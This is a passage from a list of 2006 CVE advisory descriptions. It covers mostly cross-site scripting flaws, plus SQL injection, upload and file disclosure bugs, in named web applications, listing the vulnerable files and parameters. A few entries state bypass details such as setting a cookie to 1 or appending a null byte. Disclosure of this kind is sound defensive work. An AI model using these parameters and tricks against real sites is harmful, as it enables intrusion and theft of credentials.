classifiedZONE 1.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the rtn parameter. [CVE-2006-1428] Multiple cross-site scripting (XSS) vulnerabilities in phpCOIN 1.2.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the fs parameter to (1) mod.php or (2) mod_print.php. [CVE-2006-1427] Multiple cross-site scripting (XSS) vulnerabilities in WebAPP 0.9.9.3.2 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) action, (2) id, (3) num, (4) board, (5) cat, (6) real, (7) viewcat, (8) img, or (9) curcatname parameter in cgi-bin/index.cgi, or (10) vsSD parameter in /mods/calendar/index.cgi. [CVE-2006-1425] Cross-site scripting (XSS) vulnerability in track.php in phpmyfamily 1.4.1 allows remote attackers to inject arbitrary web script or HTML via the name parameter. [CVE-2006-1418] Cross-site scripting (XSS) vulnerability in default.asp in Caloris Planitia E-School Management System 1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the msg parameter. [CVE-2006-1417] Multiple cross-site scripting (XSS) vulnerabilities in Caloris Planitia Online Quiz System (aka Web Quiz pro), possibly 1.0, allow remote attackers to inject arbitrary web script or HTML via the (1) exam parameter in prequiz.asp or (2) msg parameter in student.asp. [CVE-2006-1416] Cross-site scripting (XSS) vulnerability in afmsearch.aspx in Absolute FAQ Manager .NET 4.0 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified search module parameters, possibly the question parameter. [CVE-2006-1415] Cross-site scripting (XSS) vulnerability in iforget.aspx in dotNetBB 2.42EC SP 3 and earlier allows remote attackers to inject arbitrary web script or HTML via the em parameter. [CVE-2006-1414] Multiple cross-site scripting (XSS) vulnerabilities in toast.asp in Toast Forums 1.6 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) author, (2) subject, (3) message, or (4) dayprune parameter. [CVE-2006-1413] Multiple cross-site scripting (XSS) vulnerabilities in EZHomepagePro 1.5 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) adid or (2) aname parameter in (a) common/email.asp, (b) users/users_search.asp, or (c) users/users_profiles.asp [CVE-2006-1412] TFT Gallery 0.10 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download the admin password file and obtain password hashes via a direct request to admin/passwd. [CVE-2006-1411] Cross-site scripting (XSS) vulnerability in Absolute Image Gallery XE 2.0 and earlier allows remote attackers to inject arbitrary web script or HTML via (1) the shownew parameter in gallery.asp and (2) unspecified search module parameters. [CVE-2006-1410] Multiple cross-site scripting (XSS) vulnerabilities in XIGLA Absolute Live Support XE 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) Screen name or (2) Session Topic field. [CVE-2006-1407] Multiple cross-site scripting (XSS) vulnerabilities in Helm Web Hosting Control Panel 3.2.10 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) txtDomainName parameter to domains.asp or (2) SearchText or (3) UserLevel parameters to default.asp. [CVE-2006-1406] Multiple cross-site scripting (XSS) vulnerabilities in wbadmlog.aspx in uniForum 4.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) txtuser or (2) txtpassword parameters. [CVE-2006-1405] Cross-site scripting (XSS) vulnerability in search.aspx in SweetSuite.NET Content Management System (ssCMS) 2.1.0 and earlier allows remote attackers to inject arbitrary web script or HTML via the keywords parameter. [CVE-2006-1404] Multiple cross-site scripting (XSS) vulnerabilities in bol.cgi in BlankOL 1.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) file or (2) function parameter. [CVE-2006-1401] Multiple cross-site scripting (XSS) vulnerabilities in search.php in Calendar Express 2.2 allow remote attackers to inject arbitrary web script or HTML via the (1) allwords or (2) oneword parameter. NOTE: the provenance of this information is unknown [CVE-2006-1400] Cross-site scripting (XSS) vulnerability in MyTasks/PersonalTaskEdit.asp in Metisware Instructor 1.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the Task parameter. [CVE-2006-1399] Cross-site scripting (XSS) vulnerability in searchresult.php in Meeting Reserve 1.0 beta allows remote attackers to inject arbitrary web script or HTML via the search_term parameter. NOTE: the provenance of this information is unknown [CVE-2006-1398] Cross-site scripting (XSS) vulnerability in guestbook.php in G-Book 1.0 allows remote attackers to inject arbitrary web script or HTML via the g_message parameter. [CVE-2006-1396] Multiple cross-site scripting (XSS) vulnerabilities in Cholod MySQL Based Message Board allow remote attackers to inject arbitrary web script or HTML via unknown vectors. NOTE: the provenance of this information is unknown [CVE-2006-1394] Multiple cross-site scripting (XSS) vulnerabilities in the Microsoft IIS ISAPI filter (aka application server module) in University of Washington Pubcookie 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors. [CVE-2006-1393] Multiple cross-site scripting (XSS) vulnerabilities in the mod_pubcookie Apache application server module in University of Washington Pubcookie 1.x, 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors. [CVE-2006-1392] Multiple cross-site scripting (XSS) vulnerabilities in index.cgi in the login server in University of Washington Pubcookie 3.0.0, 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified inputs. [CVE-2006-1391] The (a) Quick 'n Easy Web Server before 3.1.1 and (b) Baby ASP Web Server 2.7.2 allows remote attackers to obtain the source code of ASP files via (1) . (dot) and (2) space characters in the extension of a URL. [CVE-2006-1384] Cross-site scripting (XSS) vulnerability in apwc_win_main.jsp in the web console in IBM Tivoli Business Systems Manager (TBSM) before 3.1.0.1 allows remote attackers to inject arbitrary web script or HTML via the skin parameter. [CVE-2006-1377] Cross-site scripting (XSS) vulnerability in img.php in (1) EasyMoblog 0.5.1 and (2) CoMoblog 1.1 allows remote attackers to inject arbitrary web script or HTML via the i parameter. [CVE-2006-1373] Cross-site scripting (XSS) vulnerability in status_image.php in PHP Live! 3.0 allows remote attackers to inject arbitrary web script or HTML via the base_url parameter. [CVE-2006-1372] Multiple SQL injection vulnerabilities in 1WebCalendar 4.0 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) EventID parameter in viewEvent.cfm, (2) NewsID parameter in newsView.cfm, or (3) ThisDate parameter in mainCal.cfm. [CVE-2006-1369] Cross-site scripting (XSS) vulnerability in Invision Power Board (IPB) 2.1.5 and earlier before 20060308 allows remote attackers to inject arbitrary web script or HTML via a Private Message (PM) in certain circumstances. [CVE-2006-1363] images.php in Justin White (aka YTZ) Free Web Publishing System (FreeWPS) 2.11 allows remote attackers to execute arbitrary PHP code by uploading a .php file into the /upload directory as specified in the dirPath parameter, then performing a direct request to that file. [CVE-2006-1361] Cross-site scripting (XSS) vulnerability in OSWiki before 0.3.1 allows remote attackers to inject arbitrary web script or HTML via the username field to (1) list.rhtml or (2) show.rhtml. [CVE-2006-1358] Unspecified vulnerability in BEA WebLogic Portal 8.1 up to SP5 causes a JSR-168 Portlet to be retrieved from the cache for the wrong session, which might allow one user to see a Portlet of another user. [CVE-2006-1357] Cross-site scripting (XSS) vulnerability in my.support.php3 in F5 Firepass 4100 SSL VPN 5.4.2 allows remote attackers to inject arbitrary web script or HTML via the s parameter. [CVE-2006-1352] BEA WebLogic Server and WebLogic Express 8.1 SP4 and earlier, 7.0 SP6 and earlier, and WebLogic Server 6.1 SP7 and earlier allow remote attackers to cause a denial of service (memory exhaustion) via crafted non-canonicalized XML documents. [CVE-2006-1351] BEA WebLogic Server 6.1 SP7 and earlier allows remote attackers to read arbitrary files via unknown attack vectors related to a "default internal servlet" accessed through HTTP. [CVE-2006-1349] Multiple cross-site scripting (XSS) vulnerabilities in Musicbox 2.3 Beta 2 allow remote attackers to inject arbitrary web script or HTML via the (1) id and (2) type and (3) show parameters in a top action in (a) index.php [CVE-2006-1348] Cross-site scripting (XSS) vulnerability in index.php in Greg Neustaetter gCards 1.45 and earlier allows remote attackers to inject arbitrary web script or HTML via the lang[][file] parameter, which is injected into an error message. NOTE: this issue might be resultant from CVE-2006-1346. [CVE-2006-1344] Cross-site scripting (XSS) vulnerability in VeriSign haydn.exe, as used in Managed PKI (MPKI) 6.0, allows remote attackers to inject arbitrary web script or HTML via a javascript URI in the VHTML_FILE parameter. [CVE-2006-1338] Webmail in MailEnable Professional Edition before 1.73 and Enterprise Edition before 1.21 allows remote attackers to cause a denial of service (CPU consumption) via unspecified vectors involving "incorrectly encoded quoted-printable emails". [CVE-2006-1336] Cross-site scripting vulnerability in calendar.php in ExtCalendar 1.0 and possibly other versions before 2.0 allows remote attackers to inject arbitrary web script or HTML via the (1) year, (2) month, (3) next, and (4) prev parameters. [CVE-2006-1334] Multiple SQL injection vulnerabilities in Maian Weblog 2.0 allow remote attackers to execute arbitrary SQL commands via the (1) entry and (2) email parameters to (a) print.php and (b) mail.php. [CVE-2006-1331] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Noah's Classifieds 1.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) method or (2) list parameter. [CVE-2006-1330] Multiple SQL injection vulnerabilities in phpWebsite 0.83 and earlier allow remote attackers to execute arbitrary SQL commands via the sid parameter to (1) friend.php or (2) article.php. [CVE-2006-1326] Multiple cross-site scripting (XSS) vulnerabilities in Invision Power Board 2.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) result_type, (2) search_in, (3) nav, (4) forums, and (5) s parameters in the Search action to index.php [CVE-2006-1325] Cross-site scripting (XSS) vulnerability in Streber 0.055 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors. [CVE-2006-1324] Cross-site scripting (XSS) vulnerability in acp/lib/class_db_mysql.php in Woltlab Burning Board (wBB) 2.3.4 allows remote attackers to inject arbitrary web script or HTML via the errormsg parameter when a SQL error is generated. [CVE-2006-1321] Cross-site scripting (XSS) vulnerability in webcheck before 1.9.6 allows remote attackers to inject arbitrary web script or HTML via the (1) url, (2) title, or (3) author name in a crawled page, which is not properly sanitized in the tooltips of a report. [CVE-2006-1295] Cross-site scripting (XSS) vulnerability in recherche.php3 in SPIP 1.8.2-g allows remote attackers to inject arbitrary web script or HTML via the recherche parameter. [CVE-2006-1293] Cross-site scripting (XSS) vulnerability in index.php in Contrexx CMS 1.0.8 and earlier allows remote attackers to inject arbitrary web script or HTML via the query string (PHP_SELF). [CVE-2006-1291] publish.ical.php in Jim Hu and Chad Little PHP iCalendar 2.21 and earlier does not require authentication for write access to the calendars directory, which allows remote attackers to upload and execute arbitrary PHP scripts via a WebDAV PUT request with a filename containing a .php extension and a trailing null character. [CVE-2006-1290] Multiple cross-site scripting (XSS) vulnerabilities in Milkeyway Captive Portal 0.1 and 0.1.1 allow remote attackers to inject arbitrary web script or HTML via the (1) ipAddress, (2) act, (3) username, and (4) unspecified other parameters in (a) authuser.php [CVE-2006-1282] CRLF injection vulnerability in inc/function.php in MyBulletinBoard (MyBB) 1.04 allows remote attackers to conduct cross-site scripting (XSS), poison caches, or hijack pages via CRLF (%0A%0D) sequences in the Referrer HTTP header field, possibly when redirecting to other web pages. [CVE-2006-1281] Cross-site scripting (XSS) vulnerability in member.php in MyBulletinBoard (MyBB) 1.04 allows remote attackers to inject arbitrary web script or HTML via the url parameter, a different vulnerability than CVE-2006-1272. NOTE: 1.10 was later reported to be vulnerable. [CVE-2006-1277] Cross-site scripting (XSS) vulnerability in signup.php in @1 File Store 2006.03.07 allows remote attackers to inject arbitrary web script or HTML via the (1) real_name, (2) email, and (3) login parameters. [CVE-2006-1272] Multiple cross-site scripting (XSS) vulnerabilities in member.php in MyBulletin Board (MyBB) 1.0.3 allow remote attackers to inject arbitrary web script or HTML via the (1) aim, (2) yahoo, (3) msn, or (4) website field. [CVE-2006-1270] Multiple cross-site scripting (XSS) vulnerabilities in zones.php in Inprotect 0.21 allow remote attackers to inject arbitrary web script or HTML via the (1) Name or (2) Description field. NOTE: the provenance of this information is unknown [CVE-2006-1266] Cross-site scripting (XSS) vulnerability in Service_Requests.asp in VPMi Enterprise 3.3 allows remote attackers to inject arbitrary web script or HTML via the Request_Name_Display parameter. [CVE-2006-1264] Cross-site scripting (XSS) vulnerability in xhawk.net discussion 2.0 beta2 allows remote attackers to inject arbitrary web script or HTML via a Javascript URI in a BBCode img tag. [CVE-2006-1263] Multiple "unannounced" cross-site scripting (XSS) vulnerabilities in WordPress before 2.0.2 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors. [CVE-2006-1261] Multiple cross-site scripting (XSS) vulnerabilities in ASPPortal 3.00 allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors. [CVE-2006-1258] Cross-site scripting (XSS) vulnerability in phpMyAdmin 2.8.0.1 allows remote attackers to inject arbitrary web script or HTML via the set_theme parameter. [CVE-2006-1256] Cross-site scripting (XSS) vulnerability in guestbook.php in Soren Boysen (SkullSplitter) PHP Guestbook 2.6 allows remote attackers to inject arbitrary web script or HTML via the url parameter. [CVE-2006-1250] Unspecified vulnerability in the Webmail module in Winmail before 4.3 has unknown impact and unknown remote attack vectors. [CVE-2006-1239] Cross-site scripting (XSS) vulnerability in issue/createissue.aspx in Gemini 2.0 allows remote attackers to inject arbitrary web script or HTML via the rtcDescription$RadEditor1 field. NOTE: the provenance of this information is unknown [CVE-2006-1233] Multiple cross-site scripting (XSS) vulnerabilities in WMNews allow remote attackers to inject arbitrary web script or HTML via the (1) ArtCat parameter to wmview.php, (2) ctrrowcol parameter to footer.php, or (3) ArtID parameter to wmcomments.php. [CVE-2006-1230] Multiple cross-site scripting (XSS) vulnerabilities in create.php in vCard 2.x allow remote attackers to inject arbitrary web script or HTML via the (1) card_id, (2) uploaded, (3) card_fontsize, or (4) card_color parameter. NOTE: the card_id vector was later reported to affect vCard 2.9, and the uploaded vector for 2.6. [CVE-2006-1226] Cross-site scripting (XSS) vulnerability in Drupal 4.5.x before 4.5.8 and 4.6.x before 4.5.8 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors. [CVE-2006-1223] Cross-site scripting (XSS) vulnerability in Jupiter Content Manager 1.1.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a Javascript URI in the image BBcode tag. [CVE-2006-1222] Multiple cross-site scripting (XSS) vulnerabilities in zeroboard 4.1 pl7 allows allow remote attackers to inject arbitrary web script or HTML via the (1) memo box title, (2) user email, and (3) homepage fields. [CVE-2006-1216] Cross-site scripting (XSS) vulnerability in bigshow.php in Runcms 1.x allows remote attackers to inject arbitrary web script or HTML via the id parameter. [CVE-2006-1215] Cross-site scripting (XSS) vulnerability in misc.php in Woltlab Burning Board (wBB) 2.3.4 allows remote attackers to inject arbitrary web script or HTML via the percent parameter. NOTE: this issue has been disputed in a followup post, although the original disclosure might be related to reflected XSS. [CVE-2006-1209] PHP Advanced Transfer Manager 1.00 through 1.30 stores sensitive information, including password hashes, under the web root with insufficient access control, which allows remote attackers to download each password hash via a direct request for a users/[USERNAME] file. [CVE-2006-1207] PHP Upload Center stores password hashes under the web root with insufficient access control, which allows remote attackers to download each password hash via a direct request for the upload/users/[USERNAME] file. [CVE-2006-1205] Multiple cross-site scripting (XSS) vulnerabilities in myWebland myBloggie 2.1.3 beta and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) confirmredirect and (2) post_id parameters in (a) delcomment.php, as reachable when mode=delcom from index.php [CVE-2006-1204] Multiple cross-site scripting (XSS) vulnerabilities in txtForum 1.0.4-dev and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) prev, (2) next, and (3) rand5 parameters in (a) index.php [CVE-2006-1202] Multiple cross-site scripting (XSS) vulnerabilities in textfileBB 1.0 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) mess and (2) user parameters in messanger.php, possibly requiring a URL encoded value. [CVE-2006-1199] Cross-site scripting (XSS) vulnerability in iframe.php in daverave Link Bank allows remote attackers to inject arbitrary web script or HTML via the site parameter. [CVE-2006-1196] Multiple cross-site scripting (XSS) vulnerabilities in QwikiWiki 1.5 allow remote attackers to inject arbitrary web script or HTML via the (1) from and (2) help parameters to (a) index.php [CVE-2006-1193] Cross-site scripting (XSS) vulnerability in Microsoft Exchange Server 2000 SP1 through SP3, when running Outlook Web Access (OWA), allows user-assisted remote attackers to inject arbitrary HTML or web script via unknown vectors related to "HTML parsing." [CVE-2006-1182] Adobe Graphics Server 2.0 and 2.1 (formerly AlterCast) and Adobe Document Server (ADS) 5.0 and 6.0 allows local users to read files with certain extensions or overwrite arbitrary files and execute code via a crafted SOAP request to the AlterCast web service in which the request uses the (1) saveContent or (2) saveOptimized ADS commands, or the (3) loadContent command. [CVE-2006-1175] The WeOnlyDo! SFTP (wodSFTP) ActiveX control is marked as safe for scripting, which allows remote attackers to read and write files in arbitrary locations by accessing the control from a web page. [CVE-2006-1165] Cross-site scripting (XSS) vulnerability in the mediamanager module in DokuWiki before 2006-03-05 allows remote attackers to inject arbitrary web script or HTML via unknown attack vectors relating to "handling EXIF data." [CVE-2006-1164] Nodez 4.6.1.1 and earlier stores sensitive data in the list.gtdat file under the web document root with insufficient access control, which allows remote attackers to obtain usernames and password hashes by directly accessing list.gtdat. [CVE-2006-1163] Cross-site scripting (XSS) vulnerability in Nodez 4.6.1.1 allows remote attackers to inject arbitrary web script or HTML via the op parameter. NOTE: it is possible that this issue is resultant from the directory traversal vulnerability. [CVE-2006-1161] Absolute path traversal vulnerability in Easy File Sharing (EFS) Web Server 3.2 allows remote registered users to execute arbitrary code by uploading a malicious file to the Windows startup folder. [CVE-2006-1160] Cross-site scripting (XSS) vulnerability in Easy File Sharing (EFS) Web Server 3.2 allows remote attackers to inject arbitrary web script or HTML via the Description field in creating a folder or uploading a file. [CVE-2006-1159] Format string vulnerability in Easy File Sharing (EFS) Web Server 3.2 allows remote attackers to cause a denial of service (server crash) and possibly execute arbitrary code via format string specifiers in the query string argument in an HTTP GET request. [CVE-2006-1157] Cross-site scripting (XSS) vulnerability in Vz Scripts ADP Forum 2.0.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the Subject field (possibly messaggio parameter) when posting a new message in post.php. [CVE-2006-1155] Cross-site scripting (XSS) vulnerability in manas tungare Site Membership Script before 8 March, 2006 allows remote attackers to inject arbitrary web script or HTML via the Error parameter in (1) login.asp and (2) default.asp. [CVE-2006-1151] Cross-site scripting vulnerability in index.php in M-Phorum 0.2 allows remote attackers to inject arbitrary web script or HTML via the go parameter. [CVE-2006-1144] Cross-site scripting (XSS) vulnerability in HitHost 1.0.0 allows remote attackers to inject arbitrary web script or HTML via (1) the user parameter in deleteuser.php and (2) the hits parameter in viewuser.php. [CVE-2006-1143] Cross-site scripting (XSS) vulnerability in FTPoed Blog Engine 1.1 allows remote attackers to inject arbitrary web script or HTML via the comment_body parameter, as used by the comment field, when posting a comment. [CVE-2006-1142] Unspecified vulnerability in Ravenous Web Server before 0.7.1 allows remote attackers to access arbitrary rvplg files, with unknown impact. [CVE-2006-1138] Unspecified vulnerability in the web server code in Xerox CopyCentre and Xerox WorkCentre Pro, running software 1.001.02.073 or earlier, or 1.001.02.074 before 1.001.02.715, allows remote attackers to cause a denial of service (memory corruption) via unknown vectors. [CVE-2006-1135] Multiple cross-site scripting (XSS) vulnerabilities in sBlog 0.7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) keyword parameter to search.php or (2) username parameter to comments_do.php. [CVE-2006-1133] Multiple cross-site scripting (XSS) vulnerabilities in vbzoom 1.11 allow remote attackers to inject arbitrary web script or HTML via the UserID parameter to (1) comment.php or (2) contact.php. NOTE: the profile.php/UserName vector is already covered by CVE-2005-2441. [CVE-2006-1131] Cross-site scripting (XSS) vulnerability in read.php in bitweaver CMS 1.2.1 allows remote attackers to inject arbitrary web script or HTML via the comment_title parameter. [CVE-2006-1130] Cross-site scripting (XSS) vulnerability in EKINboard 1.0.3 allows remote attackers to inject arbitrary web script or HTML via a Javascript URI in a BBCode img tag. [CVE-2006-1127] Cross-site scripting (XSS) vulnerability in Gallery 2 up to 2.0.2 allows remote attackers to inject arbitrary web script or HTML via the X-Forwarded-For (X_FORWARDED_FOR) HTTP header, which is not properly handled when adding a comment to an album. [CVE-2006-1122] Cross-site scripting (XSS) vulnerability in Default.asp in D2KBlog 1.0.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the msg parameter. [CVE-2006-1121] Cross-site scripting (XSS) vulnerability in CuteNews 1.4.1 allows remote attackers to inject arbitrary web script or HTML via the query string to index.php. [CVE-2006-1120] Multiple cross-site scripting (XSS) vulnerabilities in DCP-Portal 6.1.1 and earlier, with register_globals enabled, allow remote attackers to inject arbitrary web script or HTML via the (1) its_url parameter in the documents page and (2) url parameter in the send_write page of (a) index.php [CVE-2006-1110] Cross-site scripting (XSS) vulnerability in Aztek Forum 4.0 allows remote attackers to inject arbitrary web script or HTML via the message body in a new message. [CVE-2006-1107] Cross-site scripting (XSS) vulnerability in news.php in NMDeluxe before 1.0.1 allows remote attackers to inject arbitrary web script or HTML via the nick parameter. [CVE-2006-1106] Cross-site scripting (XSS) vulnerability in Pixelpost 1.5 beta 1 and earlier allows remote attackers to inject arbitrary web script or HTML via the (1) message, (2) name, (3) url, and (4) email parameters when commenting on a post. NOTE: the vendor has disputed some issues from the original disclosure, but due to the vagueness of the dispute, it is not clear whether the vendor is disputing this particular issue. [CVE-2006-1097] Multiple cross-site scripting (XSS) vulnerabilities in Datenbank MOD 2.7 and earlier for Woltlab Burning Board allow remote attackers to inject arbitrary web script or HTML via the fileid parameter to (1) info_db.php or (2) database.php. [CVE-2006-1096] * DISPUTED Cross-site scripting (XSS) vulnerability in index.php in NZ Ecommerce allows remote attackers to inject arbitrary web script or HTML via the action parameter. NOTE: the vendor has disputed this issue in a comment on the researcher's blog, but research by CVE suggests that this might be a legitimate problem. [CVE-2006-1093] Unspecified vulnerability in IBM WebSphere 5.0.2.10 through 5.0.2.15 and 5.1.1.4 through 5.1.1.9 allows remote attackers to obtain sensitive information via unknown attack vectors, which causes JSP source code to be revealed. [CVE-2006-1089] Cross-site scripting (XSS) vulnerability in header.php in PunBB 1.2.10 allows remote attackers to inject arbitrary web script or HTML via the URL, which is not properly handled when the PHP_SELF variable is used to handle a pun_page tag. [CVE-2006-1082] Multiple cross-site scripting (XSS) vulnerabilities in phpArcadeScript 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the gamename parameter in tellafriend.php, (2) the login_status parameter in loginbox.php, (3) the submissionstatus parameter in index.php, the (4) cell_title_background_color and (5) browse_cat_name parameters in browse.php, the (6) gamefile parameter in displaygame.php, and (7) possibly other parameters in unspecified PHP scripts. [CVE-2006-1080] Cross-site scripting (XSS) vulnerability in login.php in Game-Panel 2.6.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the message parameter, possibly requiring a URL encoded value. [CVE-2006-1077] Multiple cross-site scripting (XSS) vulnerabilities in the commentary in Evo-Dev evoBlog allow remote attackers to inject arbitrary web script or HTML via (1) the name parameter and (2) other unspecified parameters. [CVE-2006-1072] Cross-site scripting (XSS) vulnerability in Daverave Simplog 1.0.2 and earlier allows remote attackers to inject arbitrary web script or HTML via a blog post. [CVE-2006-1071] Cross-site scripting (XSS) vulnerability in index.php in DVguestbook 1.2.2 allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2006-1070] Cross-site scripting (XSS) vulnerability in dv_gbook.php in DVguestbook 1.0 allows remote attackers to inject arbitrary web script or HTML via the f parameter. [CVE-2006-1064] Multiple cross-site scripting (XSS) vulnerabilities in Lurker 2.0 and earlier allow remote attackers to inject arbitrary web script or HTML via unknown attack vectors. [CVE-2006-1048] Joomla! 1.0.7 and earlier allows attackers to bypass intended access restrictions and gain certain privileges via certain attack vectors related to the (1) Weblink, (2) Polls, (3) Newsfeeds, (4) Weblinks, (5) Content, (6) Content Section, (7) Content Category, (8) Contact items, or (9) Contact Search, (10) Content Search, (11) Newsfeed Search, or (12) Weblink Search. [CVE-2006-1041] Multiple cross-site scripting (XSS) vulnerabilities in Gregarius 0.5.2 allow remote attackers to inject arbitrary web script or HTML via the (1) rss_query parameter to search.php or (2) tag parameter to tags.php. [CVE-2006-1040] Cross-site scripting (XSS) vulnerability in vBulletin 3.0.12 and 3.5.3 allows remote attackers to inject arbitrary web script or HTML via the email field, which is injected in profile.php but not sanitized in sendmsg.php. [CVE-2006-1039] SAP Web Application Server (WebAS) Kernel before 7.0 allows remote attackers to inject arbitrary bytes into the HTTP response and obtain sensitive authentication information, or have other impacts, via a " [CVE-2006-1034] Multiple cross-site scripting (XSS) vulnerabilities in Woltlab Burning Board (wBB) allow remote attackers to inject arbitrary web script or HTML via (1) the username parameter to galerie_index.php and possibly (2) galerie_onfly.php. NOTE: the provenance of this information is unknown [CVE-2006-1033] Multiple cross-site scripting (XSS) vulnerabilities in Dragonfly CMS before 9.0.6.1 allow remote attackers to inject arbitrary web script or HTML via (1) uname, (2) error, (3) profile or (4) the username filed parameter to the (a) Your_Account module, (5) catid, (6) sid, (7) Story Text or (8) Extended text text fields in the (b) News module, (9) month, (10) year or (11) sa parameter to the (c) Stories_Archive module, (12) show, (13) cid, (14) ratetype, or (15) orderby parameter to the (d) Web_Links module, (16) op, or (17) pollid parameter to the (e) Surveys module, (18) c parameter to the (f) Downloads module, (19) meta, or (20) album parameter to the (g) coppermine module, or the search box in the (21) Search, (22) Stories_Archive, (23) Downloads, and (24) Topics module. [CVE-2006-1031] config/config_inc.php in iGENUS Webmail 2.02 and earlier allows remote attackers to include arbitrary local files via the SG_HOME parameter. [CVE-2006-1025] Cross-site scripting (XSS) vulnerability in manage.asp in Addsoft StoreBot 2002 Standard allows remote attackers to inject arbitrary web script or HTML via the ShipMethod parameter. NOTE: the provenance of this information is unknown [CVE-2006-1021] Cross-site scripting (XSS) vulnerability in sol_menu.php in PeHePe Uyelik Sistemi (aka PeHePe MemberShip Management System) 3 allows remote attackers to inject arbitrary web script or HTML via the kuladi parameter ($kul_adi variable). [CVE-2006-1019] Cross-site scripting (XSS) vulnerability in fce.php in UKiBoard 3.0.1 allows remote attackers to inject arbitrary web script or HTML via a BBCode url tag when using the show_post function. NOTE: the provenance of this information is unknown [CVE-2006-1008] Multiple cross-site scripting (XSS) vulnerabilities in N8cms 1.1 and 1.2 allow remote attackers to inject arbitrary web script or HTML via the (1) dir and (2) page_id parameter to (a) index.php and (3) userid parameter to (b) mailto.php. NOTE: it is possible that issues 1 and 2 are resultant from SQL injection. [CVE-2006-1004] Cross-site scripting (XSS) vulnerability in agencyprofile.asp in Parodia 6.2 and earlier allows remote attackers to inject arbitrary web script or HTML via the AG_ID parameter. NOTE: the provenance of this information is unknown [CVE-2006-0996] Cross-site scripting (XSS) vulnerability in phpinfo (info.c) in PHP 5.1.2 and 4.4.2 allows remote attackers to inject arbitrary web script or HTML via long array variables, including (1) a large number of dimensions or (2) long values, which prevents HTML tags from being removed. [CVE-2006-0985] Multiple cross-site scripting (XSS) vulnerabilities in the "post comment" functionality of WordPress 2.0.1 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) name, (2) website, and (3) comment parameters. [CVE-2006-0984] Cross-site scripting (XSS) vulnerability in inc_header.php in EJ3 TOPo 2.2.178 allows remote attackers to inject arbitrary web script or HTML via the gTopNombre parameter. [CVE-2006-0983] Cross-site scripting (XSS) vulnerability in index.php in QwikiWiki 1.4 allows remote attackers to inject arbitrary web script or HTML via the page parameter. [CVE-2006-0982] The on-access scanner for McAfee Virex 7.7 for Macintosh, in some circumstances, might not activate when malicious content is accessed from the web browser, and might not prevent the content from being saved, which allows remote attackers to bypass virus protection, as demonstrated using the EICAR test file. [CVE-2006-0980] Multiple cross-site scripting (XSS) vulnerabilities in Jay Eckles CGI Calendar 2.7 allow remote attackers to inject arbitrary web script or HTML via the year parameter in (1) index.cgi and (2) viewday.cgi. [CVE-2006-0979] Unspecified vulnerability in the local weblog publisher in Nidelven IT Issue Dealer before 0.9.96 has unknown impact and attack vectors. [CVE-2006-0978] Multiple cross-site scripting (XSS) vulnerabilities in the View Headers (aka viewheaders) functionality in ArGoSoft Mail Server Pro 1.8.8.5 allow remote attackers to inject arbitrary web script or HTML via (1) the Subject header, (2) the From header, and (3) certain other unspecified headers. [CVE-2006-0974] Cross-site scripting (XSS) vulnerability in failure.asp in Battleaxe bttlxeForum 2.0 allows remote attackers to inject arbitrary web script or HTML via the err_txt parameter. [CVE-2006-0973] SQL injection vulnerability in topics.php in Appalachian State University phpWebSite 0.10.2 and earlier allows remote attackers to execute arbitrary SQL commands via the topic parameter. [CVE-2006-0958] Cross-site scripting (XSS) vulnerability in func.inc.php in ZoneO-Soft freeForum before 1.2.1 allows remote attackers to inject arbitrary web script or HTML via the (1) name and (2) subject parameters. [CVE-2006-0947] Thomson SpeedTouch modem running firmware 5.3.2.6.0 allows remote attackers to create users that cannot be deleted via scripting code in the "31" parameter in a NewUser function, which is not filtered by the modem when creating the account, but cannot be deleted by the administrator, possibly due to cleansing that occurs in the administrator interface. [CVE-2006-0946] Cross-site scripting (XSS) vulnerability in Thomson SpeedTouch modems running firmware 5.3.2.6.0 allows remote attackers to inject arbitrary web script or HTML via the name parameter to the LocalNetwork page. [CVE-2006-0945] PHP remote file include vulnerability in admin/index.php in Archangel Weblog 0.90.02 allows remote authenticated administrators to execute arbitrary PHP code via a URL ending in a NULL (%00) in the index parameter. [CVE-2006-0944] Archangel Weblog 0.90.02 allows remote attackers to bypass authentication by setting the ba_admin cookie to 1. [CVE-2006-0941] Multiple cross-site scripting (XSS) vulnerabilities in post.php in ShoutLIVE 1.1.0 allow remote attackers to inject arbitrary web script or HTML via certain variables when posting new messages. [CVE-2006-0938] Cross-site scripting (XSS) vulnerability in eZ publish 3.7.3 and earlier allows remote attackers to inject arbitrary web script or HTML via the RefererURL parameter. [CVE-2006-0936] Free Host Shop Website Generator 3.3 allows remote authenticated users with administrative privileges to upload and execute arbitrary files via a 